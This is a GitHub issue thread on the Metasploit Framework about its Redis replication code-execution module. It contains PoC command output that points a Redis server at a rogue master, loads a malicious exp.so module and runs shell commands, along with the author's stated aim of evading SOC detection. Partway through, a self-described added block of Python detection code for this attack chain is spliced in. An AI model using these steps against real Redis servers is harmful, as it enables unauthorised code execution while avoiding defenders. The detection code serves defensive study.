rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Possible to remove the reverse tcp payload from Redis Replication Code Execution module #14407

Closed tkmru closed 1 year ago

tkmru commented 4 years ago

Summary

The Redis Replication Code Execution module uses reverse tcp to run the commands, but redis allows you to execute commands and get the results without using a reverse shell.

Basic example

After executing MODULE LOAD exp.so, I could execute the id command in redis-cli, as shown in the following execution example.

root@efb5ffa4adf5:/rogue# redis-cli -h redis
redis:6379> MODULE LOAD ./dump.rdb
OK
redis:6379> shell.exec "id"
"uid=999(redis) gid=999(redis) groups=999(redis)\n"

The same is possible with socket communication, even without using redis-cli. For example, this PoC does not use a reverse shell.

$ python3 rogue3.py --rhost 127.0.0.1 --rport 6379 --lhost 192.168.153.17 --lport 21000
TARGET 127.0.0.1:6379
SERVER 192.168.153.17:21000
[<-] ['*3', '$7', 'SLAVEOF', '$14', '192.168.153.17', '$5', '21000']
[->] ['+OK']
[<-] ['*4', '$6', 'CONFIG', '$3', 'SET', '$10', 'dbfilename', '$6', 'exp.so']
[->] ['+OK']
[->] ['*1', '$4', 'PING']
[<-] ['+PONG']
[->] ['*3', '$8', 'REPLCONF', '$14', 'listening-port', '$4', '6379']
[<-] ['+OK']
[->] ['*5', '$8', 'REPLCONF', '$4', 'capa', '$3', 'eof', '$4', 'capa', '$6', 'psync2']
[<-] ['+OK']
[->] ['*3', '$5', 'PSYNC', '$40', 'b86569ad04674b9a77f2e2195e6cd9e981c30d2d', '$1', '1']
[<-] ['*3', '$6', 'MODULE', '$4', 'LOAD', '$8', './exp.so']
[->] ['+OK']
[<-] ['*3', '$7', 'SLAVEOF', '$2', 'NO', '$3', 'ONE']
[->] ['+OK']
[<<] ls
[<-] ['*2', '$11', 'system.exec', '$7', 'ls 2>&1']
[->] ['$8', '\x08exp.so']
[<<] pwd
[<-] ['*2', '$11', 'system.exec', '$8', 'pwd 2>&1']
[->] ['$6', '/data']

Motivation

By removing the reverse tcp payload, we can shave off one useless external communication from this module. I also think it will probably make it harder for the SOC to detect when attacking. I want to try it!
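The PoC transcript above is plain RESP on the Redis port, so the whole chain (SLAVEOF to a rogue master, CONFIG SET dbfilename to a shared object, MODULE LOAD, then module-provided commands such as system.exec) is visible to anyone inspecting that traffic. The following is an added example, not code from the issue or from Metasploit: a minimal RESP encoder/decoder plus detection logic that flags that chain in a captured client stream; the TRUSTED_MASTERS allowlist and the re-encoded capture are constructed for the example.

```python
TRUSTED_MASTERS = {"10.0.0.5"}  # assumption: the site's legitimate replication masters

def resp_encode(args):
    """Encode a command (list of strings) as a RESP array of bulk strings."""
    return "".join([f"*{len(args)}\r\n"] + [f"${len(a.encode())}\r\n{a}\r\n" for a in args]).encode()

def resp_decode(buf):
    """Decode a byte stream of RESP arrays of bulk strings into argument lists."""
    cmds, i = [], 0
    while i < len(buf):
        if buf[i:i + 1] != b"*":
            raise ValueError("only arrays of bulk strings are handled here")
        j = buf.index(b"\r\n", i)
        n, i, args = int(buf[i + 1:j]), j + 2, []
        for _ in range(n):
            if buf[i:i + 1] != b"$":
                raise ValueError("expected a bulk string")
            j = buf.index(b"\r\n", i)
            ln, i = int(buf[i + 1:j]), j + 2
            args.append(buf[i:i + ln].decode())
            i += ln + 2
        cmds.append(args)
    return cmds

def flag_rogue_replication(cmds):
    """Findings for the SLAVEOF -> CONFIG SET dbfilename -> MODULE LOAD chain and
    for module-provided (dotted) commands such as the PoC's system.exec."""
    findings = []
    for args in cmds:
        up = [a.upper() for a in args]
        if up[:1] in (["SLAVEOF"], ["REPLICAOF"]) and len(args) >= 3 and up[1] != "NO":
            if args[1] not in TRUSTED_MASTERS:
                findings.append(f"replication pointed at untrusted master {args[1]}:{args[2]}")
        elif up[:3] == ["CONFIG", "SET", "DBFILENAME"] and len(args) >= 4:
            if args[3].lower().endswith(".so"):
                findings.append(f"dbfilename set to shared object {args[3]}")
        elif up[:2] == ["MODULE", "LOAD"] and len(args) >= 3:
            findings.append(f"MODULE LOAD {args[2]}")
        elif args and "." in args[0]:  # core Redis commands never contain a dot; module commands do
            findings.append(f"module command {args[0]} {' '.join(args[1:])}")
    return findings

# Constructed capture: the client side of the issue's PoC transcript, re-encoded on the wire.
CAPTURE = b"".join(resp_encode(c) for c in [
    ["SLAVEOF", "192.168.153.17", "21000"],
    ["CONFIG", "SET", "dbfilename", "exp.so"],
    ["MODULE", "LOAD", "./exp.so"],
    ["SLAVEOF", "NO", "ONE"],
    ["system.exec", "ls 2>&1"],
])
```

Running `flag_rogue_replication(resp_decode(CAPTURE))` yields four findings, one per suspicious step, while the `SLAVEOF NO ONE` cleanup and any replication to an allowlisted master produce none.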

smcintyre-r7 commented 1 year ago

Sounds like we might be able to add an ARCH_CMD target. Combine that with the existing cmd/unix/generic payload, and you'd be able to execute whatever payload you want.

smcintyre-r7 commented 1 year ago

Actually we already have a module for it. You can use auxiliary/scanner/redis/redis_server to just run a command.